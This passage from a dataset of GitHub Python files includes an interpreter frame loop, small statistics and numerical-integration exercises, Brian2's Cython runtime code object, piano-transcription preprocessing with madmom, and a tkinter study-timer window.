被调用函数的globals为调用方的globals和locals的合集\n callframe.callarg = callarg\n self.stack.append(callframe.eval(func))\n else: # 如果是内置函数\n self.stack.append(func(*callarg))\n elif args[0] == 'LOAD_ARG':\n self.locals[args[1]] = self.callarg[nowarg]\n nowarg += 1\n elif args[0] == 'INPUT':\n if args[1]:\n print(self.stack.pop(), end='')\n self.stack.append(input())\n elif args[0] == 'INT':\n self.stack.append(int(self.stack.pop()))\n elif args[0] == 'STR':\n self.stack.append(str(self.stack.pop()))\n elif args[0] == 'SET_TRY':\n self.tryop.append(op + args[1]) # 设置异常处理语句的位置\n elif args[0] == 'CLEAR_TRY':\n self.tryop = []\n elif args[0] == 'DICT':\n dictlen = args[1]\n d = {}\n for i in range(dictlen):\n key = self.stack.pop()\n val = self.stack.pop()\n d[key] = val\n self.stack.append(d)\n elif args[0] == 'CLASS':\n self.locals[args[1]] = bytecode.objects[args[1]]\n elif args[0] == 'RETURN_SELF':\n return self\n elif args[0] == 'LOAD_ATTR':\n name = self.stack.pop()\n if type(name).__name__ == 'Frame':\n self.stack.append(name.locals[args[1]])\n else:\n self.stack.append(getattr(name, args[1]))\n elif args[0] == 'STORE_ATTR':\n name = self.stack.pop()\n if type(name).__name__ == 'Frame':\n name.locals[args[1]] = self.stack.pop()\n elif args[0] == 'IMPORT':\n filename = args[1] + '.c--'\n inter = interpreter.Interpreter()\n try:\n # 先从程序路径找\n with open(f'{filename}', encoding='utf-8')as f:\n inter.interpret(f.read(), 'File', filename=filename)\n except:\n # 再从默认路径找\n with open(f'{self.IMPORT_PATH}\\\\{filename}', encoding='utf-8')as f:\n inter.interpret(f.read(), 'File', filename=filename)\n self.locals[args[1]] = inter.frame\n elif args[0] == 'LEN':\n self.stack.append(len(self.stack.pop()))\n elif args[0] == 'MERGE': # 合并\n self.locals = dict(self.locals,**self.stack.pop().locals)\n except Exception as e:\n self.exception = [type(e).__name__ + ': ' + str(e), args[-1]]\n if self.tryop: # 有对应的异常处理语句\n op = self.tryop[0]\n else:\n raise Exception\n op += 1\n","repo_name":"1604042736/c--","sub_path":"c--1.2/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"31829918796","text":"'''\n@Author: Pavan Nakate\n@Date: 2021-11-11 12:52\n@Last Modified by: Pavan Nakate\n@Last Modified time: None\n@Title : MinMaxValueSet : Print the minimum and maximum values from set \n'''\ndef min_max():\n \"\"\"\n Description:\n This Function print the minimum and maximum values from set\n Parameter:\n None\n Return:\n None\n \"\"\"\n try:\n #num Set\n num_set = set([11,2,30,4,59])\n print(\"Minimum Value : \",min(num_set))\n print(\"Maximum Value : \",max(num_set))\n \n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n min_max()","repo_name":"Pavan699/Data-Structures","sub_path":"Sets/MinMaxValueSet.py","file_name":"MinMaxValueSet.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"21913059077","text":"from logging import CRITICAL\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as stats\nimport random\n'''\n\nnational = pd.DataFrame([\"white\"] * 100000 + [\"hispanic\"] * 60000 + \\\n [\"black\"] * 50000 + [\"asian\"] * 15000 + [\"other\"] * 35000)\n\nminnesota = pd.DataFrame([\"white\"] * 600 + [\"hispanic\"] * 300 + \\\n [\"black\"] * 250 + [\"asian\"] * 75 + [\"other\"] * 150)\n\nnational_table = pd.crosstab(index=national[0], columns=\"count\")\nminnesota_table = pd.crosstab(index=minnesota[0], columns=\"count\")\n\nprint(\"National\")\nprint(national_table)\nprint(\" \")\nprint(\"Minnesota\")\nprint(minnesota_table)\nobserved = minnesota_table\n\nnational_ratios = national_table/len(national) # Get population ratios\n\nexpected = national_ratios * len(minnesota) # Get expected counts\n\nchi_squared_stat = (((observed-expected)**2)/expected).sum()\n\nprint(chi_squared_stat)\ncrit = stats.chi2.ppf(q = 0.95, # Find the critical value for 95% confidence*\n df = 4) # Df = number of variable categories - 1\n\nprint(\"Critical value\")\nprint(crit)\n\n# Find the p-value\np_value = 1 - stats.chi2.cdf(x=chi_squared_stat,df=4)\nprint(\"P value = \")\nprint(p_value)\nstats.chisquare(f_obs= observed, # Array of observed counts\n f_exp= expected)\n'''\n\n\nnoOfRandomNumber = int(input(\"Enter the number of random number: \"))\nalpha = float(input(\"Enter the value of alpha: \"))\ncritical = float(input(\"Enter the critical value of alpha: \"))\n\nrandomNumbers = []\nfor i in range(1,noOfRandomNumber+1):\n R = random.randint(1,100)\n randomNumbers.append(R)\n\nprint(\"{} {:^20} {:^20} {:^20} {:^20}\".format(\"Classes\", \"Count\", \"Frequency\", \"Diff\", \"Diff^2\"))\nclassp = 1\ncount = 0\nSofDiffS = 0\nfor i in range(10):\n classn = (i+1) * 10\n for i in range(noOfRandomNumber):\n if(randomNumbers[i]>classp and randomNumbers[i]<=classn):\n count = count + 1\n cou = '*' * count\n #Diff = frequency - (noOfRandomNumber/Classes)\n Diff = count-(noOfRandomNumber/10)\n DiffS = Diff*Diff\n SofDiffS = SofDiffS + DiffS\n print(\"{}-{} {:^25} {:^20} {:^20} {:^20}\".format(classp,classn, cou, count, Diff, DiffS))\n classp = classn\n count = 0\n\n\n\nprint(\"Chi-Square: {}/{} = {}\".format(SofDiffS,10,SofDiffS/10))\nChi_Square = SofDiffS/10\nif(critical>Chi_Square):\n print(\"Uniform\")\nelse: print(\"Not Uniform\")\n\n\n","repo_name":"Ayad-Mihidabi-Khan-Jitu/Workspace-Learning","sub_path":"LAB_CSE/LAB_SimulationAndModeling/Chi-square-test.py","file_name":"Chi-square-test.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70220641155","text":"from sympy import sin, pi, exp, sqrt, symbols\n# --example--\n# print(sin(0))\n# >>> 0\n# -----------\n\n# n:分割数, l:区間下限, u:区間上限\ndef d(n=100, l=0, u=1):\n\n def a(l):\n return l\n\n def b(u):\n return u\n\n# 変数xを定義\n x = symbols(\"x\")\n\n# 台形積分\n h = (b(u) - a(l)) / n\n S = (h / 2) * (f.subs(x, a(l)) + 2 * sum(f.subs(x, a(l) + h * i) for i in range(1, n)) + f.subs(x, b(u))) \n\n return S\n\nx = symbols(\"x\")\n\n# (1)\nn = 50\nl = 0\nu = pi / 2\nf = sin(x)\n\nresult = d(n, l, u) \nprint(\"(1)\", float(result))\n\n# (2)\nn = 100\nl = 0\nu = 1\nf = 4 / (1 + x**2)\n\nresult = d(n, l, u) \nprint(\"(2)\", float(result))\n\n# (3)\nn = 1000\nl = -100\nu = 100\nf = sqrt(pi)*exp(-x**2)\n\nresult = d(n, l, u) \nprint(\"(3)\", float(result))","repo_name":"RyomaOhtani/Basic-Python","sub_path":"trapezoidal_integral.py","file_name":"trapezoidal_integral.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36823833984","text":"import platform\n\nimport numpy\n\nfrom brian2.core.base import BrianObjectException\nfrom brian2.core.functions import Function\nfrom brian2.core.preferences import BrianPreference, prefs\nfrom brian2.core.variables import (\n ArrayVariable,\n AuxiliaryVariable,\n DynamicArrayVariable,\n Subexpression,\n)\nfrom brian2.utils.logger import get_logger\nfrom brian2.utils.stringtools import get_identifiers\n\nfrom ...codeobject import check_compiler_kwds, constant_or_scalar\nfrom ...cpp_prefs import get_compiler_and_args\nfrom ...generators.cython_generator import (\n CythonCodeGenerator,\n get_cpp_dtype,\n get_numpy_dtype,\n)\nfrom ...targets import codegen_targets\nfrom ...templates import Templater\nfrom ..numpy_rt import NumpyCodeObject\nfrom .extension_manager import cython_extension_manager\n\n__all__ = [\"CythonCodeObject\"]\n\n\nlogger = get_logger(__name__)\n\n# Preferences\nprefs.register_preferences(\n \"codegen.runtime.cython\",\n \"Cython runtime codegen preferences\",\n multiprocess_safe=BrianPreference(\n default=True,\n docs=\"\"\"\n Whether to use a lock file to prevent simultaneous write access\n to cython .pyx and .so files.\n \"\"\",\n ),\n cache_dir=BrianPreference(\n default=None,\n validator=lambda x: x is None or isinstance(x, str),\n docs=\"\"\"\n Location of the cache directory for Cython files. By default,\n will be stored in a ``brian_extensions`` subdirectory\n where Cython inline stores its temporary files\n (the result of ``get_cython_cache_dir()``).\n \"\"\",\n ),\n delete_source_files=BrianPreference(\n default=True,\n docs=\"\"\"\n Whether to delete source files after compiling. The Cython\n source files can take a significant amount of disk space, and\n are not used anymore when the compiled library file exists.\n They are therefore deleted by default, but keeping them around\n can be useful for debugging.\n \"\"\",\n ),\n)\n\n\nclass CythonCodeObject(NumpyCodeObject):\n \"\"\"\n Execute code using Cython.\n \"\"\"\n\n templater = Templater(\n \"brian2.codegen.runtime.cython_rt\",\n \".pyx\",\n env_globals={\n \"cpp_dtype\": get_cpp_dtype,\n \"numpy_dtype\": get_numpy_dtype,\n \"dtype\": numpy.dtype,\n \"constant_or_scalar\": constant_or_scalar,\n },\n )\n generator_class = CythonCodeGenerator\n class_name = \"cython\"\n\n def __init__(\n self,\n owner,\n code,\n variables,\n variable_indices,\n template_name,\n template_source,\n compiler_kwds,\n name=\"cython_code_object*\",\n ):\n check_compiler_kwds(\n compiler_kwds,\n [\n \"libraries\",\n \"include_dirs\",\n \"library_dirs\",\n \"runtime_library_dirs\",\n \"sources\",\n ],\n \"Cython\",\n )\n super().__init__(\n owner,\n code,\n variables,\n variable_indices,\n template_name,\n template_source,\n compiler_kwds={}, # do not pass the actual args\n name=name,\n )\n self.compiler, self.extra_compile_args = get_compiler_and_args()\n self.define_macros = list(prefs[\"codegen.cpp.define_macros\"])\n self.extra_link_args = list(prefs[\"codegen.cpp.extra_link_args\"])\n self.headers = [] # not actually used\n\n self.include_dirs = list(prefs[\"codegen.cpp.include_dirs\"]) + compiler_kwds.get(\n \"include_dirs\", []\n )\n self.include_dirs = list(prefs[\"codegen.cpp.include_dirs\"])\n\n self.library_dirs = list(prefs[\"codegen.cpp.library_dirs\"]) + compiler_kwds.get(\n \"library_dirs\", []\n )\n\n self.runtime_library_dirs = list(\n prefs[\"codegen.cpp.runtime_library_dirs\"]\n ) + compiler_kwds.get(\"runtime_library_dirs\", [])\n\n self.libraries = list(prefs[\"codegen.cpp.libraries\"]) + compiler_kwds.get(\n \"libraries\", []\n )\n self.sources = compiler_kwds.get(\"sources\", [])\n\n @classmethod\n def is_available(cls):\n try:\n compiler, extra_compile_args = get_compiler_and_args()\n code = \"\"\"\n #cython: language_level=3\n def main():\n cdef int x\n x = 0\"\"\"\n compiled = cython_extension_manager.create_extension(\n code,\n compiler=compiler,\n extra_compile_args=extra_compile_args,\n extra_link_args=prefs[\"codegen.cpp.extra_link_args\"],\n include_dirs=prefs[\"codegen.cpp.include_dirs\"],\n library_dirs=prefs[\"codegen.cpp.library_dirs\"],\n runtime_library_dirs=prefs[\"codegen.cpp.runtime_library_dirs\"],\n )\n compiled.main()\n return True\n except Exception as ex:\n msg = (\n f\"Cannot use Cython, a test compilation failed: {str(ex)} \"\n f\"({ex.__class__.__name__})\"\n )\n if platform.system() != \"Windows\":\n msg += (\n \"\\nCertain compiler configurations (e.g. clang in a conda \"\n \"environment on OS X) are known to be problematic. Note that \"\n \"you can switch the compiler by setting the 'CC' and 'CXX' \"\n \"environment variables. For example, you may want to try \"\n \"'CC=gcc' and 'CXX=g++'.\"\n )\n logger.warn(msg, \"failed_compile_test\")\n return False\n\n def compile_block(self, block):\n code = getattr(self.code, block, \"\").strip()\n if not code or \"EMPTY_CODE_BLOCK\" in code:\n return None\n return cython_extension_manager.create_extension(\n code,\n define_macros=self.define_macros,\n libraries=self.libraries,\n extra_compile_args=self.extra_compile_args,\n extra_link_args=self.extra_link_args,\n include_dirs=self.include_dirs,\n library_dirs=self.library_dirs,\n runtime_library_dirs=self.runtime_library_dirs,\n compiler=self.compiler,\n owner_name=f\"{self.owner.name}_{self.template_name}\",\n sources=self.sources,\n )\n\n def run_block(self, block):\n compiled_code = self.compiled_code[block]\n if compiled_code:\n try:\n return compiled_code.main(self.namespace)\n except Exception as exc:\n message = (\n \"An exception occured during the execution of the \"\n f\"'{block}' block of code object '{self.name}'.\\n\"\n )\n raise BrianObjectException(message, self.owner) from exc\n\n def _insert_func_namespace(self, func):\n impl = func.implementations[self]\n func_namespace = impl.get_namespace(self.owner)\n if func_namespace is not None:\n self.namespace.update(func_namespace)\n if impl.dependencies is not None:\n for dep in impl.dependencies.values():\n self._insert_func_namespace(dep)\n\n def variables_to_namespace(self):\n # Variables can refer to values that are either constant (e.g. dt)\n # or change every timestep (e.g. t). We add the values of the\n # constant variables here and add the names of non-constant variables\n # to a list\n\n # A list containing tuples of name and a function giving the value\n self.nonconstant_values = []\n\n for name, var in self.variables.items():\n if isinstance(var, Function):\n self._insert_func_namespace(var)\n if isinstance(var, (AuxiliaryVariable, Subexpression)):\n continue\n try:\n value = var.get_value()\n except (TypeError, AttributeError):\n # A dummy Variable without value or a function\n self.namespace[name] = var\n continue\n\n if isinstance(var, ArrayVariable):\n self.namespace[self.device.get_array_name(var, self.variables)] = value\n self.namespace[f\"_num{name}\"] = var.get_len()\n if var.scalar and var.constant:\n self.namespace[name] = value.item()\n else:\n self.namespace[name] = value\n\n if isinstance(var, DynamicArrayVariable):\n dyn_array_name = self.generator_class.get_array_name(\n var, access_data=False\n )\n self.namespace[dyn_array_name] = self.device.get_value(\n var, access_data=False\n )\n\n # Also provide the Variable object itself in the namespace (can be\n # necessary for resize operations, for example)\n self.namespace[f\"_var_{name}\"] = var\n\n # Get all identifiers in the code -- note that this is not a smart\n # function, it will get identifiers from strings, comments, etc. This\n # is not a problem here, since we only use this list to filter out\n # things. If we include something incorrectly, this only means that we\n # will pass something into the namespace unnecessarily.\n all_identifiers = get_identifiers(self.code.run)\n # Filter out all unneeded objects\n self.namespace = {\n k: v for k, v in self.namespace.items() if k in all_identifiers\n }\n\n # There is one type of objects that we have to inject into the\n # namespace with their current value at each time step: dynamic\n # arrays that change in size during runs, where the size change is not\n # initiated by the template itself\n for name, var in self.variables.items():\n if isinstance(var, DynamicArrayVariable) and var.needs_reference_update:\n array_name = self.device.get_array_name(var, self.variables)\n if array_name in self.namespace:\n self.nonconstant_values.append((array_name, var.get_value))\n if f\"_num{name}\" in self.namespace:\n self.nonconstant_values.append((f\"_num{name}\", var.get_len))\n\n def update_namespace(self):\n # update the values of the non-constant values in the namespace\n for name, func in self.nonconstant_values:\n self.namespace[name] = func()\n\n\ncodegen_targets.add(CythonCodeObject)\n","repo_name":"brian-team/brian2","sub_path":"brian2/codegen/runtime/cython_rt/cython_rt.py","file_name":"cython_rt.py","file_ext":"py","file_size_in_byte":10527,"program_lang":"python","lang":"en","doc_type":"code","stars":823,"dataset":"github-code","pt":"61"}
+{"seq_id":"39066271720","text":"from scipy.io import loadmat\nfrom scipy.io import savemat\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport glob\nimport madmom\nimport os\nimport configurations.preprocessing_parameters as ppp\nimport warnings\nfrom joblib import Parallel, delayed\nimport multiprocessing\nfrom madmom.io import midi\nfrom enum import Enum\nwarnings.filterwarnings(\"ignore\")\n\n\nclass Fold(Enum):\n \"\"\"Distinguish the different folds the model is trained on.\"\"\"\n fold_1 = 0\n fold_2 = 1\n fold_3 = 2\n fold_4 = 3\n fold_benchmark = 4\n fold_single_note = 5\n\n\ndef wav_to_spec(base_dir, filename, _audio_options):\n \"\"\"Transforms the contents of a wav file into a series of spec frames.\"\"\"\n audio_filename = os.path.join(base_dir, filename + '.wav')\n\n spec_type, audio_options = get_spec_processor(_audio_options, madmom.audio.spectrogram)\n\n # it's necessary to cast this to np.array, b/c the madmom-class holds references to way too much memory\n spectrogram = np.array(spec_type(audio_filename, **audio_options))\n return spectrogram\n\n\ndef wav_to_hpcp(base_dir, filename):\n \"\"\"Transforms the contents of a wav file into a series of spec frames.\"\"\"\n audio_filename = os.path.join(base_dir, filename + '.wav')\n audio_options = ppp.get_hpcp_parameters()\n fmin = audio_options['fmin']\n fmax = audio_options['fmax']\n hpcp_processor = getattr(madmom.audio.chroma, 'HarmonicPitchClassProfile')\n audio_options['fmin'] = fmin[0]\n audio_options['fmax'] = fmax[0]\n hpcp = np.array(hpcp_processor(audio_filename, **audio_options))\n\n for index in range(1, 7):\n audio_options['fmin'] = fmin[index]\n audio_options['fmax'] = fmax[index]\n hpcp = np.append(hpcp, np.array(hpcp_processor(audio_filename, **audio_options)), axis=1)\n audio_options['fmin'] = fmin[-1]\n audio_options['fmax'] = fmax[-1]\n #audio_options['num_classes'] = 8\n hpcp = np.append(hpcp, np.array(hpcp_processor(audio_filename, **audio_options)[:, :int(audio_options['num_classes']/3)]), axis=1)\n # post-processing,\n # normalize hpcp by max value per frame. Add a small value to avoid division by zero\n #norm_vec = np.max(hpcp, axis=1) + 1e-7\n\n #hpcp = hpcp/norm_vec[:, None]\n hpcp = np.log10(hpcp + 1.0)\n hpcp = hpcp/np.max(hpcp)\n return hpcp\n\n\ndef get_spec_processor(_audio_options, madmom_spec):\n \"\"\"Returns the madmom spectrogram processor as defined in audio options.\"\"\"\n audio_options = dict(_audio_options)\n\n if 'spectrogram_type' in audio_options:\n spectype = getattr(madmom_spec, audio_options['spectrogram_type'])\n del audio_options['spectrogram_type']\n else:\n spectype = getattr(madmom_spec, 'LogarithmicFilteredSpectrogram')\n\n if 'filterbank' in audio_options:\n audio_options['filterbank'] = getattr(madmom_spec, audio_options['filterbank'])\n else:\n audio_options['filterbank'] = getattr(madmom_spec, 'LogarithmicFilterbank')\n\n return spectype, audio_options\n\n\ndef midi_to_groundtruth(base_dir, filename, dt, n_frames, is_chroma=False):\n \"\"\"Computes the frame-wise ground truth from a piano midi file, as a note or chroma vector.\"\"\"\n midi_filename = os.path.join(base_dir, filename + '.mid')\n notes = midi.load_midi(midi_filename)\n ground_truth = np.zeros((n_frames, 12 if is_chroma else 88)).astype(np.int64)\n for onset, _pitch, duration, velocity, _channel in notes:\n pitch = int(_pitch)\n frame_start = int(np.round(onset / dt))\n frame_end = int(np.round((onset + duration) / dt))\n label = np.mod(pitch - 21, 12) if is_chroma else pitch - 21\n ground_truth[frame_start:frame_end, label] = 1\n return ground_truth\n\n\ndef preprocess_fold(fold, mode, norm=False):\n \"\"\"Preprocess an entire fold as defined in the preprocessing parameters.\n fold - Fold.fold_1, Fold.fold_2, Fold.fold_3, Fold.fold_4, Fold.fold_benchmark\n mode - 'train', 'valid' or 'test' to address the correct config parameter\n \"\"\"\n config = ppp.get_preprocessing_parameters(fold.value)\n audio_config = config['audio_config']\n\n # load fold\n filenames = open(config[mode+'_fold'], 'r').readlines()\n filenames = [f.strip() for f in filenames]\n\n for file in filenames:\n # split file path string at \"/\" and take the last split, since it's the actual filename\n write_file_to_mat(config['dataset_'+mode+'_fold'] + file.split('/')[-1],\n config['audio_path'], file, audio_config, norm,\n config['is_chroma'], config['is_hpcp'])\n\n\ndef preprocess_fold_parallel(fold, mode, norm=False):\n \"\"\"Parallel preprocess an entire fold as defined in the preprocessing parameters.\n This seems only to work on Win with Anaconda!\n fold - Fold.fold_1, Fold.fold_2, Fold.fold_3, Fold.fold_4, Fold.fold_benchmark\n mode - 'train', 'valid' or 'test' to address the correct config parameter\n \"\"\"\n config = ppp.get_preprocessing_parameters(fold.value)\n audio_config = config['audio_config']\n\n # load fold\n filenames = open(config[mode+'_fold'], 'r').readlines()\n filenames = [f.strip() for f in filenames]\n\n def parallel_loop(file):\n # split file path string at \"/\" and take the last split, since it's the actual filename\n write_file_to_mat(config['dataset_'+mode+'_fold'] + file.split('/')[-1],\n config['audio_path'], file, audio_config, norm,\n config['is_chroma'], config['is_hpcp'])\n\n num_cores = multiprocessing.cpu_count()\n\n Parallel(n_jobs=num_cores)(delayed(parallel_loop)(file) for file in filenames)\n\n\ndef write_file_to_mat(write_file, base_dir, read_file, audio_config, norm, is_chroma, is_hpcp):\n \"\"\"Transforms a wav and mid file to features and writes them to a mat file.\"\"\"\n if is_hpcp:\n spectrogram = wav_to_hpcp(base_dir, read_file)\n else:\n spectrogram = wav_to_spec(base_dir, read_file, audio_config)\n print(spectrogram.shape)\n ground_truth = midi_to_groundtruth(base_dir, read_file, 1. / audio_config['fps'], spectrogram.shape[0], is_chroma)\n\n # re-scale spectrogram to the range [0, 1]\n if norm:\n spectrogram = np.divide(spectrogram, np.max(spectrogram))\n\n savemat(write_file, {\"features\": spectrogram, \"labels\": ground_truth})\n\n\ndef stage_dataset(fold):\n chunk = 120\n inference_chunk = 10000\n train_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/train/*.mat\".format(fold))\n valid_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/valid/*.mat\".format(fold))\n test_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/test/*.mat\".format(fold))\n train_features = []\n train_labels = []\n valid_features = []\n valid_labels = []\n test_features = []\n test_labels = []\n for file in train_files:\n data = loadmat(file)\n #train_features.append(data[\"features\"])\n tensor_features = torch.Tensor(data[\"features\"].astype(np.float64))\n train_features.extend(tensor_features.split(chunk, dim=0))\n #train_labels.append(data[\"labels\"])\n tensor_labels = torch.Tensor(data[\"labels\"].astype(np.float64))\n train_labels.extend(tensor_labels.split(chunk, dim=0))\n for file in valid_files:\n data = loadmat(file)\n # train_features.append(data[\"features\"])\n tensor_features = torch.Tensor(data[\"features\"].astype(np.float64))\n valid_features.extend(tensor_features.split(inference_chunk, dim=0))\n # train_labels.append(data[\"labels\"])\n tensor_labels = torch.Tensor(data[\"labels\"].astype(np.float64))\n valid_labels.extend(tensor_labels.split(inference_chunk, dim=0))\n for file in test_files:\n data = loadmat(file)\n # train_features.append(data[\"features\"])\n tensor_features = torch.Tensor(data[\"features\"].astype(np.float64))\n test_features.extend(tensor_features.split(inference_chunk, dim=0))\n # train_labels.append(data[\"labels\"])\n tensor_labels = torch.Tensor(data[\"labels\"].astype(np.float64))\n test_labels.extend(tensor_labels.split(inference_chunk, dim=0))\n\n #for data in [train_features, train_labels, valid_features, valid_labels]:\n # for i in range(len(data)):\n # data[i] = torch.Tensor(data[i].astype(np.float64))\n\n return train_features, train_labels, valid_features, valid_labels, test_features, test_labels\n\n\ndef chunks(sequence, length):\n for index in range(0, len(sequence) - length + 1):\n yield sequence[index:index + length]\n\n\ndef stage_overlapping_dataset(fold):\n context = 7\n chunk_size = context * 2 + 1\n\n train_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/train/*.mat\".format(fold))\n valid_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/valid/*.mat\".format(fold))\n test_files = glob.glob(\"./dataset/sigtia-configuration2-splits/{}/test/*.mat\".format(fold))\n train_features = []\n train_labels = []\n valid_features = []\n valid_labels = []\n test_features = []\n test_labels = []\n for file in train_files:\n data = loadmat(file)\n #for idx in range(context, data[\"features\"].shape[0] - context):\n # features = np.reshape(data[\"features\"][idx-context:idx+context+1, :], (1, frames*data[\"features\"].shape[1]))\n # train_features.append(torch.Tensor(features.astype(np.float64)))\n features = torch.Tensor(data[\"features\"].astype(np.float64))\n train_features.extend(list(chunks(features, chunk_size)))\n\n tensor_labels = torch.Tensor(data[\"labels\"][context:-context, :].astype(np.float64))\n train_labels.extend(tensor_labels.split(1, dim=0))\n for file in valid_files:\n data = loadmat(file)\n\n #for idx in range(context, data[\"features\"].shape[0] - context):\n # features = np.reshape(data[\"features\"][idx - context:idx + context + 1, :],\n # (1, frames * data[\"features\"].shape[1]))\n # valid_features.append(torch.Tensor(features.astype(np.float64)))\n features = torch.Tensor(data[\"features\"].astype(np.float64))\n valid_features.extend(list(chunks(features, chunk_size)))\n\n tensor_labels = torch.Tensor(data[\"labels\"][context:-context, :].astype(np.float64))\n valid_labels.extend(tensor_labels.split(1, dim=0))\n for file in test_files:\n data = loadmat(file)\n\n #for idx in range(context, data[\"features\"].shape[0] - context):\n # features = np.reshape(data[\"features\"][idx - context:idx + context + 1, :],\n # (1, frames * data[\"features\"].shape[1]))\n # test_features.append(torch.Tensor(features.astype(np.float64)))\n\n features = torch.Tensor(data[\"features\"].astype(np.float64))\n test_features.extend(list(chunks(features, chunk_size)))\n\n tensor_labels = torch.Tensor(data[\"labels\"][context:-context, :].astype(np.float64))\n test_labels.extend(tensor_labels.split(1, dim=0))\n\n #for data in [train_features, train_labels, valid_features, valid_labels]:\n # for i in range(len(data)):\n # data[i] = torch.Tensor(data[i].astype(np.float64))\n\n return train_features, train_labels, valid_features, valid_labels, test_features, test_labels\n\n\ndef batchify(data, train_idx_list, batch_size):\n chunk = 1\n batch_data = []\n ii = 1\n #print(data[train_idx_list[0]].shape)\n curr_batch = F.pad(data[train_idx_list[0]], pad=[0, 0, 0, chunk-data[train_idx_list[0]].shape[0]], mode='constant', value=0).unsqueeze(0)\n #print(curr_batch.shape)\n for idx in train_idx_list[1:]:\n if ii == batch_size:\n ii = 0\n #print(curr_batch.shape)\n batch_data.append(curr_batch)\n curr_batch = F.pad(data[idx], pad=[0, 0, 0, chunk-data[idx].shape[0]], mode='constant', value=0).unsqueeze(0)\n else:\n curr_batch = torch.cat((curr_batch, F.pad(data[idx], pad=[0, 0, 0, chunk-data[idx].shape[0]], mode='constant', value=0).unsqueeze(0)), dim=0)\n\n ii += 1\n #batch_data.append(curr_batch)\n return batch_data\n\n\ndef data_generator(dataset):\n if dataset == \"JSB\":\n print('loading JSB data...')\n data = loadmat('./mdata/JSB_Chorales.mat')\n elif dataset == \"Muse\":\n print('loading Muse data...')\n data = loadmat('./mdata/MuseData.mat')\n elif dataset == \"Nott\":\n print('loading Nott data...')\n data = loadmat('./dataset/Nottingham.mat')\n elif dataset == \"Piano\":\n print('loading Piano data...')\n data = loadmat('./mdata/Piano_midi.mat')\n\n X_train = data['traindata'][0]\n X_valid = data['validdata'][0]\n X_test = data['testdata'][0]\n\n for data in [X_train, X_valid, X_test]:\n for i in range(len(data)):\n data[i] = torch.Tensor(data[i].astype(np.float64))\n\n return X_train, X_valid, X_test\n","repo_name":"iCorv/tcn_piano_transcription","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":12930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11243324652","text":"'''\nDescription: \nVersion: 2.0\nAutor: lxp\nDate: 2021-12-02 13:39:55\nLastEditors: lxp\nLastEditTime: 2021-12-02 14:52:44\n'''\nimport tkinter as tk\nfrom PIL import Image, ImageTk\nimport tkinter.messagebox\nfrom Learning_interval import Learning\n\"\"\"https://zhuanlan.zhihu.com/p/81429343\"\"\"\n\n\nclass Learning_Window(tk.Tk):\n def __init__(self, freq=1, music=False, interval=1):\n super(Learning_Window, self).__init__()\n self.freq = freq # 默认至少设定两次学习\n self.music = music\n self.action_time = interval\n self.action_name = \"学习\"\n self.action_time = 1\n self.play_music = True\n\n def main_run(self):\n # 顺序会按程序顺序执行\n self.create_window() # 1.创建窗口\n self.show_picture() # 2.显示图片\n self.button_design() # 3.学习按钮 单击启动学习\n self.get_int() # 4.获取学习设定次数\n self.mainloop()\n\n # 1. 窗口外观尺寸设计\n def create_window(self):\n self.geometry('300x600')\n self.title(\" Action \")\n\n # 2. 窗口 按钮设计\n def button_design(self):\n\n # 设定行为和时间\n tk.Label(self, text=\"输入行为:如学习\").pack()\n self.action_name = tk.Entry(self, textvariable=tk.StringVar()).pack()\n tk.Label(self, text=\"输入间隔:如45\").pack()\n self.action_time = tk.Entry(self, textvariable=tk.StringVar()).pack()\n\n # 提前结束按钮\n self.btn3 = tk.Button(master=self, text=\"退出\",\n command=self.exit_window).pack(padx=0, pady=20)\n\n # 4.学习主循环\n def get_int(self):\n try:\n print('设定action为:', self.action_name,\n \" 时间\" + str(self.action_time) + \"分钟/次:\")\n tk.messagebox.showinfo(\n \"提示\",\n \"已确定学习: \" + str(self.action_time) + \" 分钟/次\\n\" + \"请点击开始学习按钮\")\n self.start_learning()\n except:\n print('设定action为:', self.action_name,\n \" 时间\" + str(self.action_time) + \"分钟/次:\")\n tk.messagebox.showwarning(\"警告\", \"请输入整数\")\n\n # 3. 窗口 实现功能: 单击开始学习,获取学习次数,提前结束学习,记录学习次数\n def start_learning(self):\n learning_bool = tkinter.messagebox.askyesno(\n '提示', '确定要开始学习吗') # 是/否,返回值true/false\n # count = 0\n if learning_bool == True:\n s = Learning(counts=self.freq,\n interval=self.action_time) # 设定 学习次数,学习时长\n s.music = self.music # 是否播放音乐 bool\n print(\"学习中。。。\")\n s.start_()\n count = s.freq\n print(\"此次学习设定{}次,已完成{}次\".format(self.freq, count))\n else:\n print(\"学习已取消\")\n\n # 5. 窗口放入图片\n def show_picture(self):\n im = Image.open(r\"Projects\\学习间隙记录器\\window\\picture\\test.jpg\")\n # im = Image.open(\"picture/test.jpg\")\n global img\n img = ImageTk.PhotoImage(im)\n imLabel = tk.Label(self, image=img).pack() # 全局变量\n\n # 6、确认播放音乐\n def play_music(self):\n self.music = tkinter.messagebox.askyesno(\n '提示', '学习结束播放音乐吗?\\n 确定后点击开始学习按钮') # 是/否,返回值true/false\n\n # 7、结束退出程序\n def exit_window(self):\n self.destroy()\n print(\"已退出学习\")\n\n\nif __name__ == '__main__':\n\n win = Learning_Window()\n win.main_run()\n","repo_name":"SamLiu666/AI_for_learning","sub_path":"Projects/学习间隙记录器/window/Window_2.py","file_name":"Window_2.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
